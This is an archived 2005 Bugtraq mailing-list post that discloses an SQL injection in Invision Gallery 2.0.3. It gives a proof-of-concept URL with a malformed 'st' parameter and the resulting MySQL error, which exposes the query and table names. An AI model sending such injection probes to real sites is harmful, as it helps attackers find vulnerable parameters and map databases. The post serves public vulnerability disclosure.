[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: SQL In Invision Gallery 2.0.3
From: almaster () hotmail ! com
Date: 2005-10-30 15:15:52
Message-ID: 20051030151552.14318.qmail () securityfocus ! com
[Download RAW message or body]
Credit: By aLMaSTeR HaCKeR [ almaster@hotmail.com]
Vulnerable: Invision Gallery 2.0.3
EXPLIOT:
http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=|aLMaSTeR
The Error:
mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, r.id as \
rated FROM ibf_gallery_images i
LEFT JOIN ibf_members m ON ( m.id=i.member_id )
LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND \
r.member_id=0 ) WHERE category_id=26 AND i.approved=1
GROUP BY i.id
ORDER BY pinned DESC, date DESC , i.id DESC LIMIT ', 20
SQL error: You have an error in your SQL syntax; check the manual that corresponds to \
your MySQL server version for the right syntax to use near '', 20' at line 7 SQL \
error code:
Date: Sunday 30th of October 2005 04:53:19 PM
Thanks TO MY FRIENDS IN S4A.CC
almaster@s4a.cc or almaster@hotmail.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic